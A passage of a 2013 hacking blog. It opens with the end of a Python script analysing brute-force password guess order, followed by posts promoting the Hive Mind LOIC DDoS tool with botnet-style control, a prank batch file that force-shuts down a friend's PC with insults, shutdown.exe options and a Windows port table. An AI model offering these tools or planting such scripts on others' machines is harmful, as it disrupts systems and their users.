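    fastest (aaaaaaa, baaaaaa, caaaaaa, ...), so the last character is the most
    significant "digit" and a low-index last character means an early hit.
    """
    base = len(charset)
    index = {c: i for i, c in enumerate(charset)}
    rank = 0
    for pos, ch in enumerate(password):
        if ch not in index:
            raise ValueError(f"{ch!r} is not in the charset")
        rank += index[ch] * base ** pos
    return rank


def keyspace(charset: str, length: int) -> int:
    """Number of candidates of exactly `length` characters."""
    return len(charset) ** length


def compare_orders(password: str) -> dict:
    """How early a password falls with the default order versus numbers first."""
    default = guess_index(password, DEFAULT_CHARSET)
    custom = guess_index(password, NUMBERS_FIRST)
    space = keyspace(DEFAULT_CHARSET, len(password))   # same size for both orders
    return {
        "default": default,
        "numbers_first": custom,
        "fraction_of_space_default": default / space,
        "fraction_of_space_numbers_first": custom / space,
    }


def drop_rare_letters(charset: str = FREQ_LETTERS, rare: str = "jqz") -> str:
    """The post's further shortcut: leave the rarest letters out entirely."""
    return "".join(c for c in charset if c not in rare)


if __name__ == "__main__":
    for pw in ("abc123", "123abc"):     # constructed sample passwords
        print(pw, compare_orders(pw))
    short = drop_rare_letters()
    print("8-char keyspace left after dropping j, q, z:",
          keyspace(short, 8) / keyspace(FREQ_LETTERS, 8))
```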
Sunday, June 2, 2013
Google Hacks
Almost every internet user would recognize one of the most popular search engines, "GOOGLE". By using the various search operators that Google already provides, we can make our search results more accurate. An application named "Google Hacks" therefore appeared to help users make use of Google's search functions.
What is Google Hacks? Google Hacks is an open source application that can be used as an aid in searching through Google. Searching for music, ebooks, videos, product keys, lyrics and fonts is part of the basic search functionality of this program. Enter keywords and click the options provided, then Google Hacks will weave the keywords together with search operators and display Google's results pages through the browser. If we are lucky, we will get what we are looking for.
DOWNLOAD HERE
Friday, May 31, 2013
HIVE MIND LOIC
Hive Mind LOIC is a version of the Low Orbit Ion Cannon made by Praetox, which was adapted for centralized control by NewEraCracker, when the project was then taken on by me. Amongst a few fixes, I added RSS control (such as via Twitter). - Urijah
- Stress test your servers against a DDoS attack
- Control your bots via an IRC channel or an RSS server
- Minimize the application to systray
Official Website: Hive Mind LOIC
Download : HERE
Thursday, May 30, 2013
Ways To Access Blocked WebSite
Tuesday, May 28, 2013
Shutdown PC
Make use of shutdown.exe in Windows and prank your friends.
- Create a shortcut by right-clicking on the desktop, then point your mouse to New and select Shortcut.
- Type or paste the following command into the shortcut.
- C:\Windows\System32\shutdown.exe -s -t 60 -c " message "
- -s shuts down the computer | -t sets the time-out (seconds) | -c sets the message
- Simply replace 60 with any number of seconds you like, and remember to put some scary message for your friend.
Notepad Version
Copy the following code into notepad:
@echo off
msg * I don't like you
shutdown -s -t 60 -c "Error! You are too stupid!"
Save as Hackmimic_shutdown.bat
Updates:
Search this blog for the autorun script and automate it.
Full options for shutdown command
No args Display help. This is the same as typing /?.
/? Display help. This is the same as not typing any options.
/i Display the graphical user interface (GUI).
This must be the first option.
/l Log off. This cannot be used with /m or /d options.
/s Shutdown the computer.
/r Full shutdown and restart the computer.
/g Full shutdown and restart the computer. After the system is
rebooted, restart any registered applications.
/a Abort a system shutdown.
This can only be used during the time-out period.
/p Turn off the local computer with no time-out or warning.
Can be used with /d and /f options.
/h Hibernate the local computer.
Can be used with the /f option.
/hybrid Performs a shutdown of the computer and prepares it for fast startup.
Must be used with /s option.
/e Document the reason for an unexpected shutdown of a computer.
/o Go to the advanced boot options menu and restart the computer.
Must be used with /r option.
/m \\computer Specify the target computer.
/t xxx Set the time-out period before shutdown to xxx seconds.
The valid range is 0-315360000 (10 years), with a default of 30.
If the timeout period is greater than 0, the /f parameter is
implied.
/c "comment" Comment on the reason for the restart or shutdown.
Maximum of 512 characters allowed.
/f Force running applications to close without forewarning users.
The /f parameter is implied when a value greater than 0 is
specified for the /t parameter.
/d [p|u:]xx:yy Provide the reason for the restart or shutdown.
p indicates that the restart or shutdown is planned.
u indicates that the reason is user defined.
If neither p nor u is specified the restart or shutdown is
unplanned.
xx is the major reason number (positive integer less than 256).
yy is the minor reason number (positive integer less than 65536)
Monday, May 27, 2013
Ports and Protocols
Sorted by port number:
Port | Protocol | Application protocol | System Service Name
n/a | GRE | GRE (IP protocol 47) | Routing and Remote Access
n/a | ESP | IPSec ESP (IP protocol 50) | Routing and Remote Access
n/a | AH | IPSec AH (IP protocol 51) | Routing and Remote Access
7 | TCP | Echo | Simple TCP/IP Services
7 | UDP | Echo | Simple TCP/IP Services
9 | TCP | Discard | Simple TCP/IP Services
9 | UDP | Discard | Simple TCP/IP Services
13 | TCP | Daytime | Simple TCP/IP Services
13 | UDP | Daytime | Simple TCP/IP Services
17 | TCP | Quotd | Simple TCP/IP Services
17 | UDP | Quotd | Simple TCP/IP Services
19 | TCP | Chargen | Simple TCP/IP Services
19 | UDP | Chargen | Simple TCP/IP Services
20 | TCP | FTP default data | FTP Publishing Service
21 | TCP | FTP control | FTP Publishing Service
21 | TCP | FTP control | Application Layer Gateway Service
23 | TCP | Telnet | Telnet
25 | TCP | SMTP | Simple Mail Transfer Protocol
25 | UDP | SMTP | Simple Mail Transfer Protocol
25 | TCP | SMTP | Exchange Server
25 | UDP | SMTP | Exchange Server
42 | TCP | WINS Replication | Windows Internet Name Service
42 | UDP | WINS Replication | Windows Internet Name Service
53 | TCP | DNS | DNS Server
53 | UDP | DNS | DNS Server
53 | TCP | DNS | Internet Connection Firewall/Internet Connection Sharing
67 | UDP | DHCP Server | DHCP Server
67 | UDP | DHCP Server | Internet Connection Firewall/Internet Connection Sharing
69 | UDP | TFTP | Trivial FTP Daemon Service
80 | TCP | HTTP | Windows Media Services
80 | TCP | HTTP | World Wide Web Publishing Service
80 | TCP | HTTP | SharePoint Portal Server
88 | TCP | Kerberos | Kerberos Key Distribution Center
88 | UDP | Kerberos | Kerberos Key Distribution Center
102 | TCP | X.400 | Microsoft Exchange MTA Stacks
110 | TCP | POP3 | Microsoft POP3 Service
110 | TCP | POP3 | Exchange Server
119 | TCP | NNTP | Network News Transfer Protocol
123 | UDP | NTP | Windows Time
123 | UDP | SNTP | Windows Time
135 | TCP | RPC | Message Queuing
135 | TCP | RPC | Remote Procedure Call
135 | TCP | RPC | Exchange Server
135 | TCP | RPC | Certificate Services
135 | TCP | RPC | Cluster Service
135 | TCP | RPC | Distributed File System
135 | TCP | RPC | Distributed Link Tracking
135 | TCP | RPC | Distributed Transaction Coordinator
135 | TCP | RPC | Event Log
135 | TCP | RPC | Fax Service
135 | TCP | RPC | File Replication
135 | TCP | RPC | Local Security Authority
135 | TCP | RPC | Remote Storage Notification
135 | TCP | RPC | Remote Storage Server
135 | TCP | RPC | Systems Management Server 2.0
135 | TCP | RPC | Terminal Services Licensing
135 | TCP | RPC | Terminal Services Session Directory
137 | UDP | NetBIOS Name Resolution | Computer Browser
137 | UDP | NetBIOS Name Resolution | Server
137 | UDP | NetBIOS Name Resolution | Windows Internet Name Service
137 | UDP | NetBIOS Name Resolution | Net Logon
137 | UDP | NetBIOS Name Resolution | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | Computer Browser
138 | UDP | NetBIOS Datagram Service | Messenger
138 | UDP | NetBIOS Datagram Service | Server
138 | UDP | NetBIOS Datagram Service | Net Logon
138 | UDP | NetBIOS Datagram Service | Distributed File System
138 | UDP | NetBIOS Datagram Service | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | License Logging Service
139 | TCP | NetBIOS Session Service | Computer Browser
139 | TCP | NetBIOS Session Service | Fax Service
139 | TCP | NetBIOS Session Service | Performance Logs and Alerts
139 | TCP | NetBIOS Session Service | Print Spooler
139 | TCP | NetBIOS Session Service | Server
139 | TCP | NetBIOS Session Service | Net Logon
139 | TCP | NetBIOS Session Service | Remote Procedure Call Locator
139 | TCP | NetBIOS Session Service | Distributed File System
139 | TCP | NetBIOS Session Service | Systems Management Server 2.0
139 | TCP | NetBIOS Session Service | License Logging Service
143 | TCP | IMAP | Exchange Server
161 | UDP | SNMP | SNMP Service
162 | UDP | SNMP Traps Outbound | SNMP Trap Service
389 | TCP | LDAP Server | Local Security Authority
389 | UDP | LDAP Server | Local Security Authority
389 | TCP | LDAP Server | Distributed File System
389 | UDP | LDAP Server | Distributed File System
443 | TCP | HTTPS | HTTP SSL
443 | TCP | HTTPS | World Wide Web Publishing Service
443 | TCP | HTTPS | SharePoint Portal Server
445 | TCP | SMB | Fax Service
445 | TCP | SMB | Print Spooler
445 | TCP | SMB | Server
445 | TCP | SMB | Remote Procedure Call Locator
445 | TCP | SMB | Distributed File System
445 | TCP | SMB | License Logging Service
445 | TCP | SMB | Net Logon
500 | UDP | IPSec ISAKMP | Local Security Authority
515 | TCP | LPD | TCP/IP Print Server
548 | TCP | File Server for Macintosh | File Server for Macintosh
554 | TCP | RTSP | Windows Media Services
563 | TCP | NNTP over SSL | Network News Transfer Protocol
593 | TCP | RPC over HTTP | Remote Procedure Call
593 | TCP | RPC over HTTP | Exchange Server
636 | TCP | LDAP SSL | Local Security Authority
636 | UDP | LDAP SSL | Local Security Authority
993 | TCP | IMAP over SSL | Exchange Server
995 | TCP | POP3 over SSL | Exchange Server
1270 | TCP | MOM-Encrypted | Microsoft Operations Manager 2000
1433 | TCP | SQL over TCP | Microsoft SQL Server
1433 | TCP | SQL over TCP | MSSQL$UDDI
1434 | UDP | SQL Probe | Microsoft SQL Server
1434 | UDP | SQL Probe | MSSQL$UDDI
1645 | UDP | Legacy RADIUS | Internet Authentication Service
1646 | UDP | Legacy RADIUS | Internet Authentication Service
1701 | UDP | L2TP | Routing and Remote Access
1723 | TCP | PPTP | Routing and Remote Access
1755 | TCP | MMS | Windows Media Services
1755 | UDP | MMS | Windows Media Services
1801 | TCP | MSMQ | Message Queuing
1801 | UDP | MSMQ | Message Queuing
1812 | UDP | RADIUS Authentication | Internet Authentication Service
1813 | UDP | RADIUS Accounting | Internet Authentication Service
1900 | UDP | SSDP | SSDP Discovery Service
2101 | TCP | MSMQ-DCs | Message Queuing
2103 | TCP | MSMQ-RPC | Message Queuing
2105 | TCP | MSMQ-RPC | Message Queuing
2107 | TCP | MSMQ-Mgmt | Message Queuing
2393 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2394 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2460 | UDP | MS Theater | Windows Media Services
2535 | UDP | MADCAP | DHCP Server
2701 | TCP | SMS Remote Control (control) | SMS Remote Control Agent
2701 | UDP | SMS Remote Control (control) | SMS Remote Control Agent
2702 | TCP | SMS Remote Control (data) | SMS Remote Control Agent
2702 | UDP | SMS Remote Control (data) | SMS Remote Control Agent
2703 | TCP | SMS Remote Chat | SMS Remote Control Agent
2703 | UDP | SMS Remote Chat | SMS Remote Control Agent
2704 | TCP | SMS Remote File Transfer | SMS Remote Control Agent
2704 | UDP | SMS Remote File Transfer | SMS Remote Control Agent
2725 | TCP | SQL Analysis Services | SQL Analysis Server
2869 | TCP | UPNP | UPNP Device Host
2869 | TCP | SSDP event notification | SSDP Discovery Service
3268 | TCP | Global Catalog Server | Local Security Authority
3269 | TCP | Global Catalog Server | Local Security Authority
3343 | UDP | Cluster Services | Cluster Service
3389 | TCP | Terminal Services | NetMeeting Remote Desktop Sharing
3389 | TCP | Terminal Services | Terminal Services
3527 | UDP | MSMQ-Ping | Message Queuing
4011 | UDP | BINL | Remote Installation
4500 | UDP | NAT-T | Local Security Authority
5000 | TCP | SSDP legacy event notification | SSDP Discovery Service
5004 | UDP | RTP | Windows Media Services
5005 | UDP | RTCP | Windows Media Services
42424 | TCP | ASP.Net Session State | ASP.NET State Service
51515 | TCP | MOM-Clear | Microsoft Operations Manager 2000